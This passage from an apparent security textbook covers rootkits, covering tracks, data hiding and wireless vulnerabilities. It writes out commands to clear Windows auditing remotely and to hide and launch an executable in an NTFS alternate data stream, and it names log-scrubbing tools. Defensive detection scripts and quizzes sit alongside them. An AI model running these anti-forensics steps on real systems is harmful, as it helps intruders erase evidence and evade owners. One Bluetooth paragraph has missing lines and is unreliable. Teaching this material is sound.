• Installing spyware to track activity: spyware typically needs to be well placed and well hidden. A rootkit can provide a way to hide spyware such as a keylogger so it is undetectable even to those looking for it.
• Hiding the attack: a rootkit possesses the ability to alter the behavior of a system any way an attacker wants, so it can be used to hide evidence of an attack. A rootkit can be used to hide files and processes from view by altering system commands to prevent the display or detection of the attack.
• Maintaining access over the long term: if a rootkit can stay undetected, it is easy for an attacker to maintain access to the system. For an attacker, the challenge is to construct a rootkit that prevents detection by the owner of the system.
• Monitoring network traffic: a rootkit can install a network sniffer on a system to gain inside information about the activities on a network.
• Blocking the logging of selected events: to prevent detection, a rootkit can alter the system to prevent the logging of activities related to the rootkit.
• Redirecting output: a rootkit can be configured to redirect the output of commands and other activities to another system.

NOTE: Rootkits are dangerous because once a system has become the victim of a rootkit, it can no longer be trusted. A rootkit alters the behavior of a system to such a degree that the information being returned by the system itself has to be considered bogus.
NOTE: Rootkits are a form of what is known as malware, which includes software such as viruses, worms, spyware, and other related miscreants.

Above all, a rootkit is an application, and as such it can be run remotely on a target system with a tool such as PsExec. Of course, running a rootkit is one thing; obtaining one is quite another. Currently there exist many ways to get a rootkit, whether from a Web site or through a development tool designed to help nonprogrammers create basic rootkits.

Covering Tracks

An attack that can be detected is an attack that can be stopped, which is not a good result for an attacker. To stop an attack from being detected, attackers need to cover their tracks as completely and effectively as possible. Covering tracks needs to be a systematic process in which any evidence of the attack is erased, including logons, log files, error messages, files, and any other evidence that may tip off the owner of the system that something has occurred.

Disabling Auditing

One of the best ways to cover your tracks is to not leave any in the first place. In this case, disabling auditing is a way to do just that. Auditing is designed to allow the detection and tracking of events that are occurring on a system. If auditing is disabled, an attacker can deprive the system owner of the ability to detect the activities that have been carried out. When auditing is enabled, all events that the system owner chooses to track will be placed in the Windows Security Log and can be viewed as needed. An attacker can disable it with the auditpol command included with Windows. A NULL session like the one seen earlier is enough to enumerate the target, but changing its audit policy requires an administrative session to the machine, from which the attacker runs the command.

NOTE: A prepared defender of a system will regularly check event logs to note any unusual activity such as a change in audit policy.
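The note above says a prepared defender watches the event log for audit-policy changes. As an added example that is not part of the book, here is that detection logic run over a few constructed Windows event records. Security event 4719 (the system audit policy was changed) and 1102 (the audit log was cleared) are the artifacts of the track-covering this section describes; System event 7045 (a service was installed) with the service name PSEXESVC is what the PsExec commands from the previous section leave behind, because PsExec installs and starts that service on the target for the life of the session (its -r switch renames it, which is why the check also looks at the image path). The records, host names, and time window are assumptions; a real detector reads the same fields from the collected logs.

```python
from datetime import datetime, timedelta

# Constructed sample records (not real log output): the fields a log collector keeps
# from Windows System and Security events, listed in the order they were written.
SAMPLE_EVENTS = [
    {"host": "zelda", "log": "Security", "id": 4624, "time": "2024-01-10T09:00:00",
     "fields": {"TargetUserName": "jsmith", "LogonType": "2"}},
    {"host": "zelda", "log": "System", "id": 7045, "time": "2024-01-10T09:05:10",
     "fields": {"ServiceName": "PSEXESVC", "ImagePath": "%SystemRoot%\\PSEXESVC.exe",
                "AccountName": "LocalSystem"}},
    {"host": "zelda", "log": "Security", "id": 4719, "time": "2024-01-10T09:06:02",
     "fields": {"SubjectUserName": "administrator",
                "AuditPolicyChanges": "Success removed, Failure removed"}},
    {"host": "zelda", "log": "Security", "id": 1102, "time": "2024-01-10T09:06:30",
     "fields": {"SubjectUserName": "administrator"}},
    {"host": "fileserv", "log": "System", "id": 7045, "time": "2024-01-10T11:00:00",
     "fields": {"ServiceName": "Backup Agent",
                "ImagePath": "C:\\Program Files\\Backup\\agent.exe", "AccountName": "LocalSystem"}},
    {"host": "fileserv", "log": "Security", "id": 4719, "time": "2024-01-11T08:30:00",
     "fields": {"SubjectUserName": "svc_gpo", "AuditPolicyChanges": "Success added"}},
]

def classify(event):
    """Name the rule an event trips, or None for the ordinary case."""
    fields = event["fields"]
    if event["log"] == "System" and event["id"] == 7045:
        name = fields.get("ServiceName", "").lower()
        path = fields.get("ImagePath", "").lower()
        return "psexec_service_installed" if "psexesvc" in name or "psexesvc" in path else None
    if event["log"] == "Security" and event["id"] == 4719:
        return "audit_policy_changed"
    if event["log"] == "Security" and event["id"] == 1102:
        return "audit_log_cleared"
    return None

def detect(events, window=timedelta(minutes=30)):
    """Flag each artifact, and raise severity when a policy change or log clear follows a
    PsExec service install on the same host inside the window: that sequence is
    'run something remotely, then cover tracks' rather than routine administration."""
    findings = []
    last_remote_exec = {}   # host -> time of the most recent PSEXESVC install
    for ev in sorted(events, key=lambda e: datetime.fromisoformat(e["time"])):
        rule = classify(ev)
        if rule is None:
            continue
        when = datetime.fromisoformat(ev["time"])
        finding = {"host": ev["host"], "time": ev["time"], "id": ev["id"], "rule": rule,
                   "severity": "medium", "actor": ev["fields"].get("SubjectUserName")}
        if rule == "psexec_service_installed":
            last_remote_exec[ev["host"]] = when
        elif ev["host"] in last_remote_exec and when - last_remote_exec[ev["host"]] <= window:
            finding["rule"] = rule + "_after_remote_exec"
            finding["severity"] = "high"
        findings.append(finding)
    return findings

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print("%-6s %s %-5s %-42s %s" % (f["severity"], f["time"], f["id"], f["rule"], f["host"]))
```

Two details matter in practice. Event 1102 survives the clearing it records, because Windows writes it as the first entry of the freshly cleared log, so a defender who forwards logs to a collector keeps that evidence even when the attacker wipes the local copy. And the fileserv policy change is reported at medium only: on its own, a 4719 is often a group policy refresh, which is why the correlation with a preceding remote execution is what lifts severity.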
Additionally, a host-based intrusion detection system (IDS) will detect changes in audit policy and in some cases re-enable it. The command used to turn auditing off on a remote target is:

auditpol \\<ip address of target> /clear

(The \\target form is that of the older Resource Kit version of auditpol. The auditpol built into current versions of Windows acts only on the local system, so an attacker would run it from a shell on the target instead.)

It is also possible for an attacker to perform what amounts to the surgical removal of entries in the Windows Security Log using tools such as the following:

• Dumpel
• Elsave
• WinZapper

Of course, clearing audit logs isn’t the only way to clear tracks, because attackers can also use rootkits. Using techniques that will be discussed later, you can thwart rootkits to a certain degree, but once rootkits make their way onto a system, sometimes the only reliable way to ensure that a system is free of them is to rebuild that system.

CHAPTER 7 Enumeration and Computer System Hacking 183

Data Hiding

There are other ways to hide evidence of an attack, such as hiding the files placed on the system. Operating systems provide many methods that can be used to hide files, including file attributes and alternate data streams.

File attributes are a feature of operating systems that allow files to be marked as having certain properties, including read-only and hidden. Files can be flagged as hidden, making for a convenient way of hiding data and preventing detection through simple means such as directory listings or browsing in Windows Explorer. Hiding files in this way does not provide complete protection, however, because more advanced detective techniques can uncover files hidden in this manner.

Another lesser known way of hiding files in Windows is Alternate Data Streams (ADS), a feature of the New Technology File System (NTFS). Originally, this feature was designed to ensure interoperability with the Macintosh Hierarchical File System (HFS), but it has since been used by hackers.

NOTE

ADS is available only on NTFS volumes, although the version of NTFS does not matter. This feature does not work on other file systems.
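To make the stream mechanics concrete, here is an added example (mine, not the book’s) that builds a cover file with a hidden stream in a scratch directory, shows that an ordinary listing misses it, and then does what a defender would do: enumerates every stream on every file under a path and reports anything other than the default unnamed stream. The file and stream names are placeholders. It needs an NTFS volume and Windows PowerShell 3.0 or later, where the -Stream parameter exists.

```powershell
# Added example (not from the book). Hide data in an NTFS alternate data stream,
# show that ordinary listings miss it, then find and remove it. Needs an NTFS
# volume and Windows PowerShell 3.0+ (the -Stream parameter). Names are made up.

$root  = Join-Path $env:TEMP 'ads-demo'
New-Item -ItemType Directory -Path $root -Force | Out-Null
$cover = Join-Path $root 'smoke.doc'

# Visible content lives in the unnamed stream, which is what every normal tool reads.
Set-Content -Path $cover -Value 'Quarterly report draft. Nothing to see here.'

# The hidden payload goes into a named stream. Text stands in for an executable.
Set-Content -Path $cover -Stream 'ninja.exe' -Value 'MZ pretend-binary-contents'

# A normal directory listing reports only the unnamed stream's size: the payload is invisible.
'--- Get-ChildItem sees ---'
Get-ChildItem -Path $root | Select-Object Name, Length

# Defender's scan: list every stream on every file under $root. ':$DATA' is the
# unnamed default stream; Zone.Identifier is the browser's mark-of-the-web and is
# normally benign, so both are excluded. Anything left is worth examining.
$benign = @(':$DATA', 'Zone.Identifier')
$hidden = Get-ChildItem -Path $root -Recurse -File |
    ForEach-Object { Get-Item -Path $_.FullName -Stream * -ErrorAction SilentlyContinue } |
    Where-Object { $benign -notcontains $_.Stream }

'--- Alternate data streams found ---'
$hidden | Select-Object FileName, Stream, Length | Format-Table -AutoSize

# Read the hidden content back (what an attacker would do before using it),
# then strip the stream without touching the visible document.
foreach ($s in $hidden) {
    'Contents of {0}:{1} -> {2}' -f $s.FileName, $s.Stream, (Get-Content -Path $s.FileName -Stream $s.Stream)
    Remove-Item -Path $s.FileName -Stream $s.Stream
}

# Confirm only the default stream remains.
(Get-Item -Path $cover -Stream *).Stream
```

Point the scan at a real directory tree (a user profile, a web root) rather than the scratch folder to use it in earnest. The Zone.Identifier exclusion is this example’s choice; on a system where downloaded files are rare, leaving it in the report may be preferable, since an attacker can of course name a stream anything, Zone.Identifier included.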
ADS provides the ability to fork or hide file data within existing files without altering the appearance or behavior of a file in any way. In fact, when ADS is used, a file can be hidden from all traditional detection techniques as well as from dir and Windows Explorer. In practice, the use of ADS is a major security issue because it is nearly a perfect mechanism for hiding data. Once a piece of data is embedded using ADS and is hidden, it can lie in wait until the attacker decides to run it later on.

The process of creating an ADS is simple:

type ninja.exe > smoke.doc:ninja.exe

Executing this command will take the file ninja.exe and hide it behind the file smoke.doc. At this point, the file is streamed. The next step would be to delete the original file that you just hid, specifically ninja.exe. As an attacker, to retrieve the file the process is as simple as the following:

start smoke.doc:ninja.exe

This command has the effect of opening the hidden file and executing it. (On Windows Vista and later, launching an executable directly from a stream with start is no longer permitted, but the data remains just as well hidden.) As a defender, this sounds like bad news because files hidden in this way are impossible to detect using most means. But with the use of some advanced methods they can be detected. Since Windows Vista, dir /r at the command prompt also lists a file’s streams. Some of the tools that can be used to do this include:

• Sfind — A forensic tool for finding streamed files
• LNS — Used for finding ADS streamed files
• Tripwire — Used to detect changes in files, this tool by nature can detect ADS

NOTE

Depending on the version of Windows and the system settings in place, an attacker can clear events completely from an event log or remove individual events.

CHAPTER SUMMARY

Enumeration is the process of gathering more detailed information from a target system. Whereas previous information has been gathered without disturbing the target, with enumeration the target is being interacted with, and more detailed information is being returned.
Information extracted from a target at this point includes usernames, group information, share names, and other details. Once the attacker has completed enumeration, he or she begins system hacking. In the system hacking phase, the attacker starts to use the information gathered from the enumeration stage by hacking the services. This stage represents the point at which the attacker is compromising the system. An attacker who wants to perform more aggressive actions or needs greater access can perform a process known as privilege escalation. In this stage, the attacker gains access to a user account or system and attempts to grant it more access than it would otherwise have by resetting passwords of accounts that have more access or installing software that grants this level of access. Finally, the attackers cover up their tracks to avoid detection and action by possible countermeasures. They can stop auditing, clear event logs, or surgically remove events from the logs to make things look less suspicious. In this last phase, attackers eliminate the traces of their attack as completely as possible, leaving few (if any) behind.

KEY CONCEPTS AND TERMS

Backdoor
Enumeration
Keylogger
NULL session
Password cracking
Privilege escalation
Rainbow table
Rootkit
Security Account Manager (SAM)
Simple Network Management Protocol (SNMP)
Spyware
Virus

CHAPTER 7 ASSESSMENT

1. Enumeration discovers which ports are open.
A. True
B. False

2. What can enumeration discover?
A. Services
B. User accounts
C. Ports
D. Shares

3. ______ involves increasing access on a system.
A. System hacking
B. Privilege escalation
C. Enumeration
D. Backdoor

4. ______ is the process of exploiting services on a system.
A. System hacking
B. Privilege escalation
C. Enumeration
D. Backdoor

5. How are brute-force attacks performed?
A. By trying all possible combinations of characters
B. By trying dictionary words
C. By capturing hashes
D. By comparing hashes

6. A ______ is an offline attack.
A. Cracking attack
B. Rainbow attack
C. Birthday attack
D. Hashing attack

7. An attacker can use a(n) ______ to ______ a system.

8. A ______ replaces and alters system files, changing the way a system behaves at a fundamental level.
A. Rootkit
B. Virus
C. Worm
D. Trojan

9. A NULL session is used to attach to Windows remotely.
A. True
B. False

10. A(n) ______ is used to reveal passwords.

11. A ______ is used to store a password.
A. NULL session
B. Hash
C. Rainbow table
D. Rootkit

12. A ______ is a file used to store passwords.
A. Network
B. SAM
C. Database
D. NetBIOS

Wireless Vulnerabilities

WIRELESS COMMUNICATION and networking technologies have seen rapid growth and adoption over the past few years. Businesses and consumers have adopted wireless technologies for their ability to allow users to be more mobile, unencumbered by wires. Additionally, adopters have taken to the technology because it can allow connections to computers in areas where wires cannot reach or would be expensive to install. Wireless has become one of the most widely used technologies by both consumers and businesses and will most likely continue to be so.

While wireless offers many benefits, one of the concerns of the technology is security. Wireless technologies have many security issues that must be addressed by the security professional. The technology has traditionally suffered from poor or even ignored security features by those who either adopted the technology too quickly or didn’t take the time to understand the issues. Those organizations that did take the initiative in a lot of cases went too far, opting to ban the use of the technology instead of finding out how to secure it. This chapter explores how to use wireless technology in the organization, to reap its benefits but do so securely.
Like any technology, wireless can be used safely; it is only a matter of understanding the tools available to make the system secure. For example, we can leverage techniques such as encryption and authentication together with other features designed to make the system stronger and more appealing to the business. With the right know-how and some work, wireless can be secured; the technology needn’t be banned.

Chapter 8 Topics

This chapter covers the following topics and concepts:

• Why wireless security is important
• What the history of wireless technologies is
• How to work with and secure Bluetooth
• How to work with wireless local area networks (WLANs)
• What the threats to wireless LANs are
• What wireless hacking tools are
• How to protect wireless networks

Chapter 8 Goals

When you complete this chapter, you will be able to:

• Explain the significance of wireless security
• Understand the reasons behind wireless security
• Describe the history of wireless
• Understand security issues with cordless phones, satellite TV, and cell phones
• See how Bluetooth works
• Understand security issues with Bluetooth
• Detail wireless LANs and how they work
• Describe threats to wireless LANs
• List types of wireless hacking tools
• Understand how to defend wireless networks

The Importance of Wireless Security

Wireless technologies have been adopted rapidly over the last decade, but security for those networks has not. As individuals and organizations looked to adopt the technology, security was dealt with in a number of different ways: either by not adopting security measures at all in some cases or by blocking the use of the technology in others. Both cases represent extremes that need not be used, because wireless can be secured if the security vulnerabilities and issues involved are known. Wireless networks have a number of vulnerabilities that must be understood before they can be properly dealt with.
NOTE

Except for fiber optic media, all networks are subject to emanations in the form of electromagnetic radiation. In the case of copper cables, this emanation is a result of electrical charges flowing through the media and generating a field.

Emanations

One of the traits of wireless networks is the way they work through the use of radio frequency (RF) or radio techniques. This is both a strength and a weakness because it allows wireless transmissions to reach out in all directions, enabling connectivity but also allowing anyone in those directions to eavesdrop. As opposed to the transmission of signals in traditional media such as copper or fiber, where someone must be on the “wire” to listen, wireless travels through the air and can easily be picked up by anyone with a device as simple as a notebook with a wireless card. This leads to a huge administrative and security headache and it immediately makes clear the need for additional security measures.

NOTE

Anything that generates radio signals on the same or related frequencies can interfere with wireless networks in some form. By extension, anything that affects the atmosphere that the signals are traveling through will cause interference. However, it is also of note that interference does not mean that a network will be offline. Interference can manifest itself as a slow or poorly performing network.

Emanations of a wireless network can be affected by a number of different factors that make the transmission go farther or shorter distances, including the following:

• Atmospheric conditions — Warm or cold weather will affect how far a signal will go due to the changes in air density that changing temperatures cause.
• Building materials — Materials surrounding an access point (AP) such as metal, brick, or stone will impede a wireless signal.
• Nearby devices — Other devices in the area (for example, microwave ovens and cell phones) that give off RF signals or generate strong magnetic fields can affect emanations.

Common Support and Availability

Wireless networks have become more and more common over the last few years, being shipped in all manner of devices and gadgets. From the early 2000s up to the current day, wireless technologies in the form of Bluetooth and Wi-Fi have become more common, with both features going from being an option to being standard equipment in notebooks and netbooks. This increased support of wireless technology can be seen even in cell phones, in which Bluetooth support became standard with Wi-Fi support following closely behind on the standard feature list of devices.

FYI

Consider how ubiquitous Bluetooth support is in cell phones alone. A company that wants to eliminate the use of Bluetooth would have a monumental task on its hands because just about all cell phones include this feature. In fact, in some high-security areas, employees have been forced to purchase used cell phones from years ago or go without cell phones while at work.

CHAPTER 8 Wireless Vulnerabilities 189

What Is Wi-Fi?

Wi-Fi is a trademark introduced in 1999 and owned by the Wi-Fi Alliance that is used to brand wireless technologies that conform to the 802.11 standard. For a product to bear the Wi-Fi logo, it must pass testing procedures to ensure it meets 802.11 standards. The Wi-Fi program was introduced due to the widespread problems of interoperability that plagued early wireless devices. Wi-Fi is commonly used to refer to wireless networking much as the name Coke is used to refer to any soft drink, but just because a device uses the 802.11 standard does not mean it is Wi-Fi (it may not have undergone testing).

The widespread availability of wireless has made management and security much harder for the network and security administrator.
With so many devices implementing wireless, it is now more possible that an employee of a company could bring in a wireless-enabled laptop or other device and attach it to the network without the knowledge of an administrator. In some situations, employees have decided that a company IT department that has said “No wireless” is just being unreasonable and, oblivious to the security risks, have taken it upon themselves to install a wireless AP.

A Brief History of Wireless Technologies

Wireless technologies aren’t anything new; in fact, wireless has been around for more than a decade for networks and even longer for devices such as cordless phones. The first wireless networks debuted in the mid-1990s with educational institutions, large businesses, and governments as early adopters. The early networks did not resemble the networks in use today because they were mainly proprietary and performed poorly compared with today’s deployments.

In today’s environment, the business or consumer looking to purchase a wireless networking technology will encounter a large selection of options. Among them is the Institute of Electrical and Electronics Engineers (IEEE) 802.11 family of standards, which range from 802.11a to 802.11n. They are known collectively as Wi-Fi in standard jargon. In addition to the 802.11 family of wireless standards, other wireless technologies have emerged (Bluetooth, for example), each purporting to offer something unique.

When looking at wireless networking it is easy to think of it as one standard, but this is not the case. Wireless networks have evolved into a family of standards over time; each includes unique attributes. To understand wireless, it is worth looking at the different standards and their benefits and performance. The following sections discuss the wireless standards that have been or are in use.
802.11

The 802.11 standard was the first wireless standard that saw any major usage outside of proprietary or custom deployments. It was used mainly by large companies and educational institutions that could afford the equipment, training, and implementation costs. One of the biggest problems with 802.11 that led to limited usage was performance. The maximum bandwidth was theoretically 2 megabits per second (Mbps); in practice, it reached at best only half this speed. The 802.11 standard was introduced in 1997 and saw limited usage, but quickly disappeared. Its features included:

• Bandwidth — 2 Mbps
• Frequency — 2.4 GHz (gigahertz)

802.11b

The first widely adopted wireless technology was 802.11b, introduced two years after the original 802.11 standard. It didn’t take too long to be adopted by businesses and consumers alike. The most attractive feature of this standard is performance: 802.11b increased performance up to a theoretical 11 Mbps, which translated to a real-world speed of 6 to 7 Mbps. Other attractive features of the standard include low cost for the consumer and for the product manufacturer. Its features include:

• Bandwidth — 11 Mbps
• Frequency — 2.4 GHz

NOTE

802.11b is being rapidly replaced in favor of 802.11g and n, but it is still very widely used and supported, with most notebooks still supporting the technology off the shelf and 802.11b APs still available.

One downside of 802.11b is interference. 802.11b has a frequency of 2.4 GHz, the same frequency as other devices such as cordless phones and game controllers, so these devices can interfere with 802.11b. Additionally, interference can be caused by home appliances such as microwave ovens.

802.11a

When 802.11b was being developed, another standard was created in parallel: 802.11a. It debuted around the same time as 802.11b, but never saw widespread adoption due to its high cost and lesser range.
One of the largest stumbling blocks that hampered its adoption was equipment prices, so the alternative 802.11b was implemented much more quickly and is seen in more places than 802.11a. Today 802.11a is rarely seen. The 802.11a standard did offer some benefits over 802.11b, notably much greater bandwidth: 54 Mbps over 802.11b’s 11 Mbps. Also, 802.11a operates in a higher frequency range (5 GHz), which means less chance for interference because fewer devices operate in this range. Equally, the 5 GHz signal of 802.11a does not penetrate walls or other materials as well, allowing it to be somewhat easily contained.

FYI

At one point 802.11a was widely used by businesses due to the performance, cost, and security benefits. The business world adopted wireless primarily because of its better performance and their bigger budgets. Businesses also found a unique benefit in the ability to contain the signal with standard building materials. However, today’s world has seen the replacement of 802.11a with 802.11g and 802.11n networks supplemented with appropriate security technologies.

The 802.11a standard is not compatible with 802.11b or any other standard due to the way it is designed. APs that support 802.11a and other standards simply have internals that support both standards. Its features include:

• Bandwidth — 54 Mbps
• Frequency — 5 GHz

802.11g

In response to consumer and business demands for higher performance, 802.11g wireless networks emerged. The 802.11g standard is a technology that combines the best of both worlds (802.11a and 802.11b). The most compelling feature of 802.11g is the higher bandwidth of 54 Mbps combined with the 2.4 GHz frequency. This allows for greater range and backward compatibility with 802.11b (but not 802.11a).
In fact, wireless network adapters that use the 802.11b standard are compatible with 802.11g APs, which allowed many businesses and users to migrate more quickly to the new technology. Its features include:

• Bandwidth — 54 Mbps
• Frequency — 2.4 GHz

NOTE

Some networks that identify themselves as 802.11b are actually 802.11g networks and are being identified as otherwise by a wireless card that is not aware of 802.11g.

802.11n

Currently emerging in the marketplace of wireless technologies is 802.11n, which increased the amount of bandwidth that was available in previous technologies up to 600 Mbps in some configurations. The 802.11n standard uses a new method of transmitting signals known as multiple input and multiple output (MIMO), which can transmit multiple signals across multiple antennas. The 802.11n standard offers backward compatibility with 802.11g, so it will encourage adoption of the technology by consumers. Its features include:

• Bandwidth — Up to 600 Mbps
• Frequency — 2.4 GHz (802.11n equipment can also operate in the 5 GHz band)

What’s in a Name?

The name Bluetooth may seem odd, but it does have reasoning behind it. Bluetooth got its name from a Danish Viking king named Harald Blåtand. In the tenth century, Blåtand united all of Denmark and Norway under his rule, much as Bluetooth unites different technologies wirelessly. Why the name Bluetooth? King Harald apparently liked wild blueberries, which stained his teeth, leading people to call him “Bluetooth.”

Other Wireless Technologies

While wireless networking in the form of 802.11 is probably the best known by the average consumer, other wireless technologies are in widespread use, including Bluetooth and WiMax.

Bluetooth

Bluetooth is a technology that emerged for the first time in 1998. From the beginning, Bluetooth was designed to be a short-range networking technology that could connect different devices together.
The technology offers neither the performance nor the range of some other technologies, but its intention wasn’t to connect devices over long distances. Bluetooth was intended to be a connectivity technology that could allow devices to talk over a distance of no more than 10 meters with low bandwidth requirements. While the bandwidth may seem low, consider the fact that the technology is used to connect devices that do not need massive bandwidth, like headsets and personal digital assistants (PDAs). Bluetooth falls into the category of technologies known as Personal Area Networking (PAN).

WiMax

A new wireless technology that has emerged over the last few years is WiMax. WiMax is similar in concept to Wi-Fi, but uses different technologies. WiMax is specifically designed to deliver Internet access over the so-called last mile to homes or businesses that may not otherwise be able to get access. In theory, WiMax can cover distances up to 30 miles, but in practice ranges of 10 miles are more likely. The technology was not designed for local area networks; it would fall into the category of Metropolitan Area Networking (MAN).

NOTE

WiMax is being adopted as a technology to cover some metropolitan areas with wireless access in an effort to offer free Internet access to the masses.

Working with and Securing Bluetooth

Bluetooth emerged as a concept in the mid-1990s as a way to reduce the wires and cables that cluttered offices and other environments. In 1998, the Bluetooth Special Interest Group (SIG) was created to develop the concept known as Bluetooth and to speed its adoption among the public. The founders of this group included technology giants such as IBM, Intel, Nokia, Toshiba, and Ericsson.
After the standard was implemented, manufacturers rapidly started manufacturing all sorts of Bluetooth devices; everything from mice to keyboards to printers showed up on the market, all Bluetooth enabled. What makes the technology so attractive is its flexibility. Bluetooth has been used in numerous applications including:

• Connections between cell phones and hands-free headsets and earpieces
• Low bandwidth network applications
• Wireless PC input and output devices such as mice and keyboards
• Data transfer applications
• GPS connections
• Bar code scanners
• A replacement for infrared
• A supplement to universal serial bus (USB) applications
• Wireless bridging
• Video game consoles
• Wireless modems

Bluetooth has worked very well to link together devices wirelessly, but the technology has problems with security. Bluetooth does, however, support techniques that enforce security to make using enabled devices less vulnerable.

Bluetooth Security

Bluetooth technology was designed to include some security measures to make the technology safer. Each mechanism that is employed can be part of a solution to make using the technology acceptable to individuals and businesses.

Trusted Devices

Bluetooth employs security mechanisms called “trusted devices,” which have the ability to exchange data without asking any permission because they are already trusted to do so.

Bluetooth Everywhere

The victims of Bluetooth attacks aren’t just computers, cell phones, and PDAs; they can be any type of Bluetooth-enabled system such as a car stereo. A new piece of software known as the Car Whisperer, for instance, allows an attacker to send and receive audio from a Bluetooth-enabled car stereo. As with any technology, the attacks will come along with every new innovation and upgrade. Device manufacturers try to anticipate every problem, but unfortunately they may be left doing firmware updates and patches later.
With trusted devices in use, any device that is not trusted will automatically prompt the user to decide whether to allow the connection or not. A device that is trusted in this system should adhere to certain guidelines. It should be:

• A personal device that you own such as a cell phone, PDA, media player, or other similar device
• A device owned by the company and identified as such. These devices could include printers, PDAs, or similar types of devices.

An untrusted device is defined as follows:

• A device that is not under the immediate control of an individual or company is questionable. Devices that fall in this category are any public devices for which you cannot readily identify the owner or trust the owner.

The idea behind trusted devices is that unknown devices are not allowed to connect without being explicitly approved. If an untrusted device were allowed to connect without being approved, it could mean that a device could accidentally or maliciously connect to a system and gain access to the device. When working with Bluetooth-enabled devices, take special care to attach only to devices you know. Users should be taught to avoid attaching to devices that they do not know and cannot trust. Impress upon users the difference between trusted and untrusted devices when making connections. Stress that unsolicited connection requests should never be accepted.

Discoverable Devices

In an effort to make Bluetooth devices easy to configure and pair with other devices, the discoverability feature was added to the product. When Bluetooth devices are set to be discoverable, they can be seen or discovered by other Bluetooth devices that are in range. The problem with a device being set to be discoverable is that it can be seen by the owners of devices who have both good and bad intentions.
In fact, a discoverable device could allow an attacker to attach to a Bluetooth device undetected and swipe data off of it quite easily.

Know Your Defaults

Device manufacturers such as those who make cell phones are known to set their devices to be discoverable by default. The idea behind having it as the default mode is that the device is easier for the consumer to use right out of the box. The security issue is that a consumer may not be aware of the security risks and leave this feature enabled. Discoverability should be enabled only to pair devices and then be disabled afterward. This is a technique that newer models of these devices are starting to use.

Keep Your Enemies Close

Bluetooth hacking may seem like less of a problem because the range of the technology is only about 10 meters. But as with most things in technology and security, there is always a work-around, and Bluetooth’s range is no different. A 2004 article published in Popular Science (and available on its Web site) titled “Bluetooth a Mile Away” discussed how to extend Bluetooth’s range substantially. The article showed how to modify simple, off-the-shelf components to boost the reach of Bluetooth way beyond what is specified, all for a price tag of less than $70.

A simple exercise like this shows just how an attacker can change the nature of the “game” in creative ways. Attackers used to have to be in close proximity to the victim, but now they can be much farther away.

It is getting less common to find devices set with their default mode of operation to be discoverable. But don’t take anything for granted. When issuing cell phones to employees, always check to make sure that the device is set to be nondiscoverable unless absolutely necessary.

Bluejacking, Bluesnarfing, and Bluebugging

Bluejacking, Bluesnarfing, and Bluebugging are attacks made possible by devices being discoverable. Bluejacking involves a Bluetooth user transmitting a business card, a form of text message, to another Bluetooth user. If the recipient doesn’t realize what the message is, he or she may allow the contact to be added to their address book. After that, the sender becomes a trusted user. For example, Bluejacking allows someone authorized or unauthorized to send messages to a cell phone. The other threat posed by discoverability is Bluesnarfing, which is used to steal data from a phone. Bluebugging is an attack in which attackers can use the device being attacked for more than accessing data: they can use the services of the device for purposes such as making calls or sending text messages.

Viruses and Malware

An issue that was not initially addressed when Bluetooth
debuted was viruses. Viruses were already a well-known fact
of life in the computer world, but there really was not much
leveraged the discoverability feature to locate and infect nearby
tend to use connections that require the sender to be authen-
ticated and authorized prior to accepting any data, which
severely curtails the capability of an unknown device to spread
an infection. With the technology the way it stands now,
a user must agree to open a file and install it, diminishing the potential threat but not eliminating it.

NOTE

Never underestimate the creativity and ambition of an attacker or virus writer. They thrive on adapting their methods to leverage new technologies and devices, and wireless is no different. When Bluetooth debuted, no security was provided because no manufacturer perceived a threat; this opened the door to some notable attacks later.


NOTE

While Bluetooth manufacturers have given us the tools to secure the technology, it is definitely up to us to use them. Manufacturers may or may not enable security features on their devices.

Securing Bluetooth

Bluetooth isn’t going away and shouldn’t be shunned because of a few security issues; the technology can be secure if used carefully. The makers of Bluetooth have given us the tools to use the technology safely, and these tools coupled with a healthy dose of common sense can make all the difference.

Discovering

Ensure that discoverability on devices is disabled after pairings have
been established between devices. In practice, there is no need for
discoverability after a pairing has been made so the feature should
be shut off unless it’s needed for some other reason.

Working with Wireless LANs

Wireless LANs are built upon the 802.11 family of standards and operate in a similar manner to wired networks. The difference between the two, beyond the obvious lack of wires, is the fundamental functioning of the network itself.

One of the big differences between wired and wireless is the way signals are trans-
mitted and received on the network.

CSMA/CD Versus CSMA/CA

In networks based on the Ethernet standard (802.3), stations transmit their information using what is known as the Carrier Sense Multiple Access with Collision Detection (CSMA/CD) method. Networks that use this method have stations that transmit their information as needed, but collisions are possible when two stations transmit at the same time. To understand the method, think of the way a phone conversation works: Two people can talk, and if they happen to talk at the same time, neither will be able to understand what is being said. In this situation, both talkers stop talking and wait to see who is going to talk instead. This is the same method that CSMA/CD uses. In this setup, if two stations transmit at the same time, a collision takes place and is detected; then both stop and wait for a random period of time before retransmitting.

In wireless networks based on the 802.11 standard, the method is a little different and is called Carrier Sense Multiple Access with Collision Avoidance (CSMA/CA). Networks that use this method “listen” to see whether any other station is transmitting before they transmit themselves. This would be like looking both ways before crossing the street. Much as with CSMA/CD, if a station “hears” another station transmitting, it waits a random period of time before trying again.

An item that is present in wireless networks but not in wired networks is the access point
(AP). An AP is a device that wireless clients associate to in order to gain access to the
network (more on that later). In order for a wireless client to gain access to the services
offered on the wired network on which the AP is connected, it must first associate to it.

APs come in many different types, with a diverse range of capabilities from the
consumer to commercial grade. The choice of an AP can have a substantial impact on
the overall performance and available features of the network, including range, security,
and installation options.

Role of APs

APs offer a tremendous range of capabilities that dictate how the network operates. When
choosing an AP, an organization needs to consider its goals, because choosing the wrong AP
can severely hamper the performance of the net. For example, in large enterprises the consumer
grade AP that can be purchased at an electronics retailer would be completely inappropriate
in most cases due to its inability to offer enterprise security and management features.

Service Set Identifier (SSID)

A detail that is universally available in wireless networks is the service set identifier (SSID).
The SSID is used to uniquely identify a network, thereby ensuring that clients can locate
the correct wireless local area network (WLAN) that they should be attaching to. The SSID
is attached to each packet as it is generated and is represented as a 32-character sequence
uniquely identifying the network.

The SSID is one of the first details that wireless clients will “see” when connecting
to a network, so a few things should be considered. First, in most APs the SSID is set
to a default setting such as the manufacturer’s name (for example, “Linksys” or “dlink”),
which should be changed to something more appropriate. Second, considerations
should be made to turn off broadcast of the SSID where appropriate. By default in most
networks the SSID broadcast is turned on, which means that the ID will be broadcast,
unencrypted, in beacon frames. These beacon frames allow clients to much more
easily associate with their AP but also have the side effect of allowing software
such as Netstumbler to identify the network and find its physical location.

Off or On

There has been some debate about whether turning the SSID on or off is a good idea. On one side
of the argument, turning it off makes it more difficult to locate an AP (but not impossible). In fact,
some experts have argued that turning off the broadcast isn’t even worth doing because a serious
